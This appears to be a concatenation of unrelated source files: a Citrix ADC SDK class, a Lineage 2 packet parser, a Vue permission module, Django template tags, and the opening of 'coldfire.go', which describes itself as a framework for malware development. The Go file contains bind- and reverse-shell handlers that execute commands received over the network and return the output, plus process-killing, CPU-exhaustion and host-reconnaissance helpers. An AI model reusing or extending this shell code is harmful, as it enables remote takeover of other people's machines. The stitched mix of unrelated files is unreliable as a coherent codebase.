r"""On enabling this option, NGS will send data used by Web/saas app at the end of every HTTP transaction to configured collectors.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._websaasappusagereporting
except Exception as e:
raise e
@websaasappusagereporting.setter
def websaasappusagereporting(self, websaasappusagereporting) :
r"""On enabling this option, NGS will send data used by Web/saas app at the end of every HTTP transaction to configured collectors.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._websaasappusagereporting = websaasappusagereporting
except Exception as e:
raise e
@property
def metrics(self) :
r"""Enable Citrix ADC Stats to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._metrics
except Exception as e:
raise e
@metrics.setter
def metrics(self, metrics) :
r"""Enable Citrix ADC Stats to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._metrics = metrics
except Exception as e:
raise e
@property
def events(self) :
r"""Enable Events to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._events
except Exception as e:
raise e
@events.setter
def events(self, events) :
r"""Enable Events to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._events = events
except Exception as e:
raise e
@property
def auditlogs(self) :
r"""Enable Auditlogs to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._auditlogs
except Exception as e:
raise e
@auditlogs.setter
def auditlogs(self, auditlogs) :
r"""Enable Auditlogs to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._auditlogs = auditlogs
except Exception as e:
raise e
@property
def observationpointid(self) :
r"""An observation point ID is identifier for the NetScaler from which appflow records are being exported. By default, the NetScaler IP is the observation point ID.<br/>Minimum length = 1.
"""
try :
return self._observationpointid
except Exception as e:
raise e
@observationpointid.setter
def observationpointid(self, observationpointid) :
r"""An observation point ID is identifier for the NetScaler from which appflow records are being exported. By default, the NetScaler IP is the observation point ID.<br/>Minimum length = 1
"""
try :
self._observationpointid = observationpointid
except Exception as e:
raise e
@property
def distributedtracing(self) :
r"""Enable generation of the distributed tracing templates in the Appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._distributedtracing
except Exception as e:
raise e
@distributedtracing.setter
def distributedtracing(self, distributedtracing) :
r"""Enable generation of the distributed tracing templates in the Appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._distributedtracing = distributedtracing
except Exception as e:
raise e
@property
def disttracingsamplingrate(self) :
r"""Sampling rate for Distributed Tracing.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._disttracingsamplingrate
except Exception as e:
raise e
@disttracingsamplingrate.setter
def disttracingsamplingrate(self, disttracingsamplingrate) :
r"""Sampling rate for Distributed Tracing.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._disttracingsamplingrate = disttracingsamplingrate
except Exception as e:
raise e
@property
def tcpattackcounterinterval(self) :
r"""Interval, in seconds, at which to send tcp attack counters to the configured collectors. If 0 is configured, the record is not sent.<br/>Default value: 0<br/>Maximum length = 3600.
"""
try :
return self._tcpattackcounterinterval
except Exception as e:
raise e
@tcpattackcounterinterval.setter
def tcpattackcounterinterval(self, tcpattackcounterinterval) :
r"""Interval, in seconds, at which to send tcp attack counters to the configured collectors. If 0 is configured, the record is not sent.<br/>Default value: 0<br/>Maximum length = 3600
"""
try :
self._tcpattackcounterinterval = tcpattackcounterinterval
except Exception as e:
raise e
@property
def logstreamovernsip(self) :
r"""To use the Citrix ADC IP to send Logstream records instead of the SNIP.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._logstreamovernsip
except Exception as e:
raise e
@logstreamovernsip.setter
def logstreamovernsip(self, logstreamovernsip) :
r"""To use the Citrix ADC IP to send Logstream records instead of the SNIP.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._logstreamovernsip = logstreamovernsip
except Exception as e:
raise e
@property
def analyticsauthtoken(self) :
r"""Authentication token to be set by the agent.<br/>Maximum length = 256.
"""
try :
return self._analyticsauthtoken
except Exception as e:
raise e
@analyticsauthtoken.setter
def analyticsauthtoken(self, analyticsauthtoken) :
r"""Authentication token to be set by the agent.<br/>Maximum length = 256
"""
try :
self._analyticsauthtoken = analyticsauthtoken
except Exception as e:
raise e
@property
def timeseriesovernsip(self) :
r"""To use the Citrix ADC IP to send Time series data such as metrics and events, instead of the SNIP.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._timeseriesovernsip
except Exception as e:
raise e
@timeseriesovernsip.setter
def timeseriesovernsip(self, timeseriesovernsip) :
r"""To use the Citrix ADC IP to send Time series data such as metrics and events, instead of the SNIP.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._timeseriesovernsip = timeseriesovernsip
except Exception as e:
raise e
@property
def builtin(self) :
r"""Flag to determine if the appflow param is built-in or not.<br/>Possible values = MODIFIABLE, DELETABLE, IMMUTABLE, PARTITION_ALL.
"""
try :
return self._builtin
except Exception as e:
raise e
@property
def feature(self) :
r"""The feature to be checked while applying this config.
"""
try :
return self._feature
except Exception as e:
raise e
@property
def tcpburstreporting(self) :
r"""TCP burst reporting enable/disable knob.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._tcpburstreporting
except Exception as e:
raise e
@property
def tcpburstreportingthreshold(self) :
r"""TCP burst reporting threshold.<br/>Default value: 1500<br/>Minimum value = 10<br/>Maximum value = 5000.
"""
try :
return self._tcpburstreportingthreshold
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(appflowparam_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.appflowparam
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
return 0
except Exception as e :
raise e
@classmethod
def filter_update_parameters(cls, resource) :
r""" Use this function to create a resource with only update operation specific parameters.
"""
updateresource = appflowparam()
updateresource.templaterefresh = resource.templaterefresh
updateresource.appnamerefresh = resource.appnamerefresh
updateresource.flowrecordinterval = resource.flowrecordinterval
updateresource.securityinsightrecordinterval = resource.securityinsightrecordinterval
updateresource.udppmtu = resource.udppmtu
updateresource.httpurl = resource.httpurl
updateresource.aaausername = resource.aaausername
updateresource.httpcookie = resource.httpcookie
updateresource.httpreferer = resource.httpreferer
updateresource.httpmethod = resource.httpmethod
updateresource.httphost = resource.httphost
updateresource.httpuseragent = resource.httpuseragent
updateresource.clienttrafficonly = resource.clienttrafficonly
updateresource.httpcontenttype = resource.httpcontenttype
updateresource.httpauthorization = resource.httpauthorization
updateresource.httpvia = resource.httpvia
updateresource.httpxforwardedfor = resource.httpxforwardedfor
updateresource.httplocation = resource.httplocation
updateresource.httpsetcookie = resource.httpsetcookie
updateresource.httpsetcookie2 = resource.httpsetcookie2
updateresource.connectionchaining = resource.connectionchaining
updateresource.httpdomain = resource.httpdomain
updateresource.skipcacheredirectionhttptransaction = resource.skipcacheredirectionhttptransaction
updateresource.identifiername = resource.identifiername
updateresource.identifiersessionname = resource.identifiersessionname
updateresource.observationdomainid = resource.observationdomainid
updateresource.observationdomainname = resource.observationdomainname
updateresource.subscriberawareness = resource.subscriberawareness
updateresource.subscriberidobfuscation = resource.subscriberidobfuscation
updateresource.subscriberidobfuscationalgo = resource.subscriberidobfuscationalgo
updateresource.gxsessionreporting = resource.gxsessionreporting
updateresource.securityinsighttraffic = resource.securityinsighttraffic
updateresource.cacheinsight = resource.cacheinsight
updateresource.videoinsight = resource.videoinsight
updateresource.httpquerywithurl = resource.httpquerywithurl
updateresource.urlcategory = resource.urlcategory
updateresource.lsnlogging = resource.lsnlogging
updateresource.cqareporting = resource.cqareporting
updateresource.emailaddress = resource.emailaddress
updateresource.usagerecordinterval = resource.usagerecordinterval
updateresource.websaasappusagereporting = resource.websaasappusagereporting
updateresource.metrics = resource.metrics
updateresource.events = resource.events
updateresource.auditlogs = resource.auditlogs
updateresource.observationpointid = resource.observationpointid
updateresource.distributedtracing = resource.distributedtracing
updateresource.disttracingsamplingrate = resource.disttracingsamplingrate
updateresource.tcpattackcounterinterval = resource.tcpattackcounterinterval
updateresource.logstreamovernsip = resource.logstreamovernsip
updateresource.analyticsauthtoken = resource.analyticsauthtoken
updateresource.timeseriesovernsip = resource.timeseriesovernsip
return updateresource
@classmethod
def update(cls, client, resource) :
r""" Use this API to update appflowparam.
"""
try :
if type(resource) is not list :
updateresource = cls.filter_update_parameters(resource)
return updateresource.update_resource(client)
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
r""" Use this API to unset the properties of appflowparam resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = appflowparam()
return unsetresource.unset_resource(client, args)
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
r""" Use this API to fetch all the appflowparam resources that are configured on netscaler.
"""
try :
if not name :
obj = appflowparam()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
class Httpreferer:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Logstreamovernsip:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Websaasappusagereporting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Cqareporting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Feature:
WL = "WL"
WebLogging = "WebLogging"
SP = "SP"
SurgeProtection = "SurgeProtection"
LB = "LB"
LoadBalancing = "LoadBalancing"
CS = "CS"
ContentSwitching = "ContentSwitching"
CR = "CR"
CacheRedirection = "CacheRedirection"
SC = "SC"
SureConnect = "SureConnect"
CMP = "CMP"
CMPcntl = "CMPcntl"
CompressionControl = "CompressionControl"
PQ = "PQ"
PriorityQueuing = "PriorityQueuing"
HDOSP = "HDOSP"
HttpDoSProtection = "HttpDoSProtection"
SSLVPN = "SSLVPN"
AAA = "AAA"
GSLB = "GSLB"
GlobalServerLoadBalancing = "GlobalServerLoadBalancing"
SSL = "SSL"
SSLOffload = "SSLOffload"
SSLOffloading = "SSLOffloading"
CF = "CF"
ContentFiltering = "ContentFiltering"
IC = "IC"
IntegratedCaching = "IntegratedCaching"
OSPF = "OSPF"
OSPFRouting = "OSPFRouting"
RIP = "RIP"
RIPRouting = "RIPRouting"
BGP = "BGP"
BGPRouting = "BGPRouting"
REWRITE = "REWRITE"
IPv6PT = "IPv6PT"
IPv6protocoltranslation = "IPv6protocoltranslation"
AppFw = "AppFw"
ApplicationFirewall = "ApplicationFirewall"
RESPONDER = "RESPONDER"
HTMLInjection = "HTMLInjection"
push = "push"
NSPush = "NSPush"
NetScalerPush = "NetScalerPush"
AppFlow = "AppFlow"
CloudBridge = "CloudBridge"
ISIS = "ISIS"
ISISRouting = "ISISRouting"
CH = "CH"
CallHome = "CallHome"
AppQoE = "AppQoE"
ContentAccelerator = "ContentAccelerator"
SYSTEM = "SYSTEM"
RISE = "RISE"
FEO = "FEO"
LSN = "LSN"
LargeScaleNAT = "LargeScaleNAT"
RDPProxy = "RDPProxy"
Rep = "Rep"
Reputation = "Reputation"
URLFiltering = "URLFiltering"
VideoOptimization = "VideoOptimization"
ForwardProxy = "ForwardProxy"
SSLInterception = "SSLInterception"
AdaptiveTCP = "AdaptiveTCP"
CQA = "CQA"
CI = "CI"
ContentInspection = "ContentInspection"
Bot = "Bot"
APIGateway = "APIGateway"
class Httpsetcookie:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpvia:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Gxsessionreporting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpdomain:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Videoinsight:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpsetcookie2:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Auditlogs:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Builtin:
MODIFIABLE = "MODIFIABLE"
DELETABLE = "DELETABLE"
IMMUTABLE = "IMMUTABLE"
PARTITION_ALL = "PARTITION_ALL"
class Httpquerywithurl:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpauthorization:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Urlcategory:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Skipcacheredirectionhttptransaction:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Aaausername:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Lsnlogging:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Clienttrafficonly:
YES = "YES"
NO = "NO"
class Securityinsighttraffic:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpcontenttype:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Cacheinsight:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Timeseriesovernsip:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Emailaddress:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpmethod:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Subscriberawareness:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httplocation:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Distributedtracing:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Identifiersessionname:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Tcpburstreporting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Metrics:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Connectionchaining:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Subscriberidobfuscation:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpxforwardedfor:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Subscriberidobfuscationalgo:
MD5 = "MD5"
SHA256 = "SHA256"
class Identifiername:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpcookie:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpurl:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Events:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpuseragent:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httphost:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class appflowparam_response(base_response) :
def __init__(self, length=1) :
self.appflowparam = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.appflowparam = [appflowparam() for _ in range(length)]
PartySmallWindowAll.ts
import GameClientPacket from "./GameClientPacket";
import { GlobalEvents } from "../../mmocore/EventEmitter";
import L2Character from "../../entities/L2Character";
import L2PartyMember from "../../entities/L2PartyMember";
export default class PartySmallWindowAll extends GameClientPacket {
// @Override
readImpl(): boolean {
const _id = this.readC();
const _leaderObjectId = this.readD();
const _distributionType = this.readD();
const _memberCount = this.readD();
this.Client.PartyList.clear();
for (let i = 0; i < _memberCount; i++) {
const _objectId = this.readD();
const char = new L2PartyMember();
char.ObjectId = _objectId;
char.Name = this.readS();
char.Cp = this.readD();
char.MaxCp = this.readD();
char.Hp = this.readD();
char.MaxHp = this.readD();
char.Mp = this.readD();
char.MaxMp = this.readD();
char.Level = this.readD();
char.ClassId = this.readD();
const _pad1 = this.readD();
char.Race = this.readD();
const _pad2 = this.readD();
const _pad3 = this.readD();
const _summonObjId = this.readD();
if (_summonObjId > 0) {
const _summonId = this.readD();
const _summonType = this.readD();
const _summonName = this.readS();
const _summonHp = this.readD();
const _summonMaxHp = this.readD();
const _summonMp = this.readD();
const _summonMaxMp = this.readD();
const _summonLevel = this.readD();
}
char.IsPartyLeader = char.ObjectId === _leaderObjectId;
this.Client.PartyList.add(char);
}
return true;
}
// @Override
run(): void {
// no-op
}
}
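// Layout note (inferred from the reads above; meanings of the pad values are
// assumptions): leader objectId, distribution type, member count, then per
// member objectId, name, CP/HP/MP current-max pairs, level, classId, race and
// padding, followed by an optional summon sub-record only when summonObjId > 0.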
permission.js
import {
asyncRouterMap,
constantRouterMap
} from 'src/router'
import { fetchAll } from 'api/admin/menu/index';
/**
 * Check whether a route's authority matches the current user's permissions.
 * @param menus
 * @param route
 */
function hasPermission(menus, route) {
if (route.authority) {
if (menus[route.authority] !== undefined) {
return menus[route.authority];
} else {
return false;
}
} else {
return true
}
}
/**
 * Recursively filter the async routing table, returning only the routes
 * the user's role is permitted to access.
 * @param asyncRouterMap
 * @param menus
 * @param menuDatas
 */
function filterAsyncRouter(asyncRouterMap, menus, menuDatas) {
const accessedRouters = asyncRouterMap.filter(route => {
if (hasPermission(menus, route)) {
if (route.authority && menuDatas[route.authority]) {
route.name = menuDatas[route.authority].title;
route.icon = menuDatas[route.authority].icon;
}
if (route.children && route.children.length) {
route.children = filterAsyncRouter(route.children, menus, menuDatas);
}
return true
}
return false
})
return accessedRouters
}
const permission = {
state: {
routers: constantRouterMap,
addRouters: []
},
mutations: {
SET_ROUTERS: (state, routers) => {
state.addRouters = routers
state.routers = constantRouterMap.concat(routers)
}
},
actions: {
GenerateRoutes({
commit
}, menus) {
return new Promise(resolve => {
fetchAll().then(data => {
const menuDatas = {};
for (let i = 0; i < data.length; i++) {
menuDatas[data[i].code] = data[i];
}
const accessedRouters = filterAsyncRouter(asyncRouterMap, menus, menuDatas);
commit('SET_ROUTERS', accessedRouters);
resolve();
});
})
}
}
};
export default permission;
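// Hypothetical wiring sketch (the store and router instances are assumptions,
// not part of this module): a navigation guard would typically run
//   store.dispatch('GenerateRoutes', menus).then(() => {
//     router.addRoutes(store.state.permission.addRouters)
//   })
// so the filtered routes are registered before the first protected navigation.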
mc2_tags.py
from django import template
from django_gravatar.templatetags.gravatar import gravatar_url
# Get template.Library instance
register = template.Library()
# enables the use of the gravatar_url as an assignment tag
register.assignment_tag(gravatar_url)
@register.simple_tag(takes_context=True)
def display_name(context):
user = context['user']
full_name = ' '.join([user.first_name, user.last_name]).strip()
return full_name if full_name else user.username
@register.filter
def multiply(value, factor):
try:
return value * factor
except: # noqa
pass # noqa
    return 0
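# Hedged usage sketch: in a template, after {% load mc2_tags %} one would
# typically write {% display_name %} for the context user's label and
# {{ price|multiply:1.2 }} for the filter, which falls back to 0 on bad input.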
coldfire.go
// Package coldfire is a framework that provides functions
// for malware development that are mostly compatible with
// Linux and Windows operating systems.
package coldfire
import (
"archive/zip"
"bufio"
"bytes"
"crypto/aes"
"crypto/cipher"
"crypto/md5"
crandom "crypto/rand"
"encoding/base64"
"encoding/binary"
"encoding/hex"
"fmt"
"io"
"io/ioutil"
"log"
"math/rand"
"net"
"net/http"
"os"
"os/exec"
"reflect"
"regexp"
"runtime"
"strconv"
"strings"
"time"
portscanner "github.com/anvie/port-scanner"
"github.com/fatih/color"
"github.com/google/gopacket"
"github.com/google/gopacket/pcap"
"github.com/jackpal/gateway"
"github.com/matishsiao/goInfo"
"github.com/mitchellh/go-homedir"
ps "github.com/mitchellh/go-ps"
"github.com/savaki/jq"
// wapi "github.com/iamacarpet/go-win64api"
// "tawesoft.co.uk/go/dialog"
)
var (
Red = color.New(color.FgRed).SprintFunc()
Green = color.New(color.FgGreen).SprintFunc()
Cyan = color.New(color.FgBlue).SprintFunc()
Bold = color.New(color.Bold).SprintFunc()
Yellow = color.New(color.FgYellow).SprintFunc()
Magenta = color.New(color.FgMagenta).SprintFunc()
)
// Revert returns a reversed string.
func Revert(s string) string {
r := []rune(s)
for i, j := 0, len(r)-1; i < len(r)/2; i, j = i+1, j-1 {
r[i], r[j] = r[j], r[i]
}
return string(r)
}
// IpIncrement increments an IP address by 1.
func IpIncrement(ip net.IP) {
for j := len(ip) - 1; j >= 0; j-- {
ip[j]++
if ip[j] > 0 {
break
}
}
}
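// Illustrative sketch (the helper name is ours, not part of the library):
// walk a small address range by applying IpIncrement repeatedly.
func ipIncrementExample() {
	ip := net.ParseIP("192.168.0.0").To4()
	for i := 0; i < 4; i++ {
		fmt.Println(ip.String()) // 192.168.0.0 through 192.168.0.3
		IpIncrement(ip)
	}
}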
// KillProcByPID kills a process given its PID.
func KillProcByPID(pid int) error {
return killProcByPID(pid)
}
func handleBind(conn net.Conn) {
for {
buffer := make([]byte, 1024)
length, err := conn.Read(buffer)
if err != nil || length == 0 {
return
}
command := strings.TrimSpace(string(buffer[:length]))
out, _ := CmdOut(command)
// parts := strings.Fields(command)
// head := parts[0]
// parts = parts[1:len(parts)]
// out, _ := exec.Command(head,parts...).Output()
conn.Write([]byte(out))
}
}
func handleReverse(conn net.Conn) {
message, _ := bufio.NewReader(conn).ReadString('\n')
out, err := exec.Command(strings.TrimSuffix(message, "\n")).Output()
if err != nil {
fmt.Fprintf(conn, "%s\n", err)
}
fmt.Fprintf(conn, "%s\n", out)
}
func getNTPTime() time.Time {
type ntp struct {
FirstByte, A, B, C uint8
D, E, F uint32
G, H uint64
ReceiveTime uint64
J uint64
}
sock, _ := net.Dial("udp", "us.pool.ntp.org:123")
sock.SetDeadline(time.Now().Add((2 * time.Second)))
defer sock.Close()
transmit := new(ntp)
transmit.FirstByte = 0x1b
binary.Write(sock, binary.BigEndian, transmit)
binary.Read(sock, binary.BigEndian, transmit)
return time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((transmit.ReceiveTime >> 32) * 1000000000)))
}
// func _sleep(seconds int, endSignal chan<- bool) {
// time.Sleep(time.Duration(seconds) * time.Second)
// endSignal <- true
// }
// F is a wrapper for the Sprintf function.
func F(str string, arg ...interface{}) string {
return fmt.Sprintf(str, arg...)
}
func f(s string, arg ...interface{}) string {
return fmt.Sprintf(s, arg...)
}
// PrintGood is used to print output indicating success.
func PrintGood(msg string) {
dt := time.Now()
t := dt.Format("15:04")
fmt.Printf("[%s] %s :: %s \n", Green(t), Green(Bold("[+]")), msg)
}
// PrintInfo is used to print output containing information.
func PrintInfo(msg string) {
dt := time.Now()
t := dt.Format("15:04")
fmt.Printf("[%s] [*] :: %s\n", t, msg)
}
// PrintError is used to print output indicating failure.
func PrintError(msg string) {
dt := time.Now()
t := dt.Format("15:04")
fmt.Printf("[%s] %s :: %s \n", Red(t), Red(Bold("[x]")), msg)
}
// PrintWarning is used to print output indicating potential failure.
func PrintWarning(msg string) {
dt := time.Now()
t := dt.Format("15:04")
fmt.Printf("[%s] %s :: %s \n", Yellow(t), Yellow(Bold("[!]")), msg)
}
// FileToSlice reads a textfile and returns all lines as an array.
func FileToSlice(file string) []string {
fil, _ := os.Open(file)
defer fil.Close()
var lines []string
scanner := bufio.NewScanner(fil)
for scanner.Scan() {
lines = append(lines, scanner.Text())
}
return lines
}
// Contains is used to check if an element exists in an array type agnostically.
func Contains(s interface{}, elem interface{}) bool {
arrV := reflect.ValueOf(s)
if arrV.Kind() == reflect.Slice {
for i := 0; i < arrV.Len(); i++ {
if arrV.Index(i).Interface() == elem {
return true
}
}
}
return false
}
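// Minimal sketch (the helper name is ours): Contains reflects over any slice
// type, so no per-type helper is needed.
func containsExample() {
	fmt.Println(Contains([]string{"a", "b"}, "b")) // true
	fmt.Println(Contains([]int{1, 2, 3}, 5))       // false
}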
// StrToInt converts a string into an integer.
func StrToInt(string_integer string) int {
// i, _ := strconv.ParseInt(string_integer, 10, 32)
i, _ := strconv.Atoi(string_integer)
return i
}
// StrToWords returns a list of strings which was split by spaces.
func StrToWords(s string) []string {
words := []string{}
gr := strings.Split(s, " ")
for x := range gr {
z := gr[x]
if len(z) != 0 {
words = append(words, z)
}
}
return words
}
// IntToStr converts an integer into a string.
func IntToStr(i int) string {
return strconv.Itoa(i)
}
// SizeToBytes converts a human friendly string indicating size into a proper integer.
func SizeToBytes(size string) int {
period_letter := string(size[len(size)-1])
intr := string(size[:len(size)-1])
i, _ := strconv.Atoi(intr)
switch period_letter {
case "g":
return i * 1024 * 1024 * 1024
case "m":
return i * 1024 * 1024
case "k":
return i * 1024
}
return i
}
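// Suffix convention sketch: SizeToBytes("512k") == 524288,
// SizeToBytes("2m") == 2097152, SizeToBytes("1g") == 1073741824; any other
// trailing character is simply dropped and the remaining digits returned.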
// Alloc allocates memory without use.
func Alloc(size string) {
_ = make([]byte, SizeToBytes(size))
}
// IntervalToSeconds converts a human friendly string indicating time into a proper integer.
func IntervalToSeconds(interval string) int {
period_letter := string(interval[len(interval)-1])
intr := string(interval[:len(interval)-1])
i, _ := strconv.Atoi(intr)
switch period_letter {
case "s":
return i
case "m":
return i * 60
case "h":
return i * 3600
case "d":
return i * 24 * 3600
}
return i
}
// GenCpuLoad gives the Cpu work to do by spawning goroutines.
func GenCpuLoad(cores int, interval string, percentage int) {
runtime.GOMAXPROCS(cores)
unitHundresOfMicrosecond := 1000
runMicrosecond := unitHundresOfMicrosecond * percentage
// sleepMicrosecond := unitHundresOfMicrosecond*100 - runMicrosecond
for i := 0; i < cores; i++ {
go func() {
runtime.LockOSThread()
for {
begin := time.Now()
for {
if time.Since(begin) > time.Duration(runMicrosecond)*time.Microsecond {
break
}
}
}
}()
}
t, _ := time.ParseDuration(interval)
time.Sleep(t)
}
// RandomInt returns an integer within a given range.
func RandomInt(min int, max int) int {
rand.Seed(time.Now().UnixNano())
return rand.Intn(max-min) + min
}
// RandomSelectStr returns a string that was randomly selected from a list of strings.
func RandomSelectStr(list []string) string {
rand.Seed(time.Now().UnixNano())
return list[rand.Intn(len(list))]
}
// RandomSelectStrNested returns a string array that was randomly selected from a nested list of strings
func RandomSelectStrNested(list [][]string) []string {
rand.Seed(time.Now().UnixNano())
return list[rand.Intn(len(list))]
}
// RandomSelectInt returns an integer that was randomly selected from a list of integers.
func RandomSelectInt(list []int) int {
rand.Seed(time.Now().UnixNano())
return list[rand.Intn(len(list))]
}
// RemoveNewlines removes possible newlines from a string.
func RemoveNewlines(s string) string {
re := regexp.MustCompile(`\r?\n`)
s = re.ReplaceAllString(s, " ")
return s
}
// FullRemove removes all instances of a string from another string.
func FullRemove(str string, to_remove string) string {
return strings.Replace(str, to_remove, "", -1)
}
// RemoveDuplicatesStr returns an array of strings that are unique to each other.
func RemoveDuplicatesStr(slice []string) []string {
keys := make(map[string]bool)
list := []string{}
for _, entry := range slice {
if _, value := keys[entry]; !value {
keys[entry] = true
list = append(list, entry)
}
}
return list
}
// RemoveDuplicatesInt returns an array of integers that are unique to each other.
func RemoveDuplicatesInt(slice []int) []int {
keys := make(map[int]bool)
list := []int{}
for _, entry := range slice {
if _, value := keys[entry]; !value {
keys[entry] = true
list = append(list, entry)
}
}
return list
}
// ContainsAny checks if a string exists within a list of strings.
func ContainsAny(str string, elements []string) bool {
for element := range elements {
e := elements[element]
if strings.Contains(str, e) {
return true
}
}
return false
}
// RandomString randomly generates an alphabetic string of a given length.
func RandomString(n int) string {
rand.Seed(time.Now().UnixNano())
var letters = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
b := make([]rune, n)
for i := range b {
b[i] = letters[rand.Intn(len(letters))]
}
return string(b)
}
// ExitOnError prints a given error and then stops execution of the process.
func ExitOnError(e error) {
if e != nil {
PrintError(e.Error())
os.Exit(0)
}
}
// RemoveFromSlice removes a string from a list of strings if it exists.
func RemoveFromSlice(slice []string, element string) []string {
res := []string{}
for _, e := range slice {
if e != element {
res = append(res, e)
}
}
return res
}
// GetLocalIp is used to get the local Ip address of the machine.
func GetLocalIp() string {
conn, _ := net.Dial("udp", "8.8.8.8:80")
defer conn.Close()
ip := conn.LocalAddr().(*net.UDPAddr).IP
return fmt.Sprintf("%d.%d.%d.%d", ip[0], ip[1], ip[2], ip[3])
}
// GetGlobalIp is used to return the global Ip address of the machine.
func GetGlobalIp() string {
ip := ""
resolvers := []string{
"https://api.ipify.org?format=text",
"http://myexternalip.com/raw",
"http://ident.me",
}
for {
url := RandomSelectStr(resolvers)
resp, err := http.Get(url)
if err != nil {
log.Printf("%v\n", err)
continue
}
i, _ := ioutil.ReadAll(resp.Body)
resp.Body.Close()
ip = string(i)
if resp.StatusCode == 200 {
break
}
}
return ip
}
// GetGatewayIP returns the Ip address of the gateway in the network where the machine resides.
func GetGatewayIP() string {
ip, err := gateway.DiscoverGateway()
ExitOnError(err)
return ip.String()
}
// Iface returns the currently used wireless interface and its MAC address.
func Iface() (string, string) {
current_iface := ""
interfaces, err := net.Interfaces()
ExitOnError(err)
for _, interf := range interfaces {
if addrs, err := interf.Addrs(); err == nil {
for _, addr := range addrs {
if strings.Contains(addr.String(), GetLocalIp()) {
current_iface = interf.Name
}
}
}
}
netInterface, err := net.InterfaceByName(current_iface)
ExitOnError(err)
name := netInterface.Name
macAddress := netInterface.HardwareAddr
hwAddr, err := net.ParseMAC(macAddress.String())
ExitOnError(err)
return name, hwAddr.String()
}
// Ifaces returns the names of all local interfaces.
func Ifaces() []string {
ifs := []string{}
interfaces, _ := net.Interfaces()
for _, interf := range interfaces {
ifs = append(ifs, interf.Name)
}
return ifs
}
// Info is used to return basic system information.
// Note that if information cannot be resolved for a
// specific field, it returns "N/A".
func Info() map[string]string {
_, mac := Iface()
var (
u string
ap_ip string
)
i := goInfo.GetInfo()
u = info()
ap_ip = ""
_ = ap_ip
hdir, err := homedir.Dir()
if err != nil {
log.Fatal(err)
}
inf := map[string]string{
"username": u,
"hostname": fmt.Sprintf("%v", i.Hostname),
"go_os": fmt.Sprintf("%v", i.GoOS),
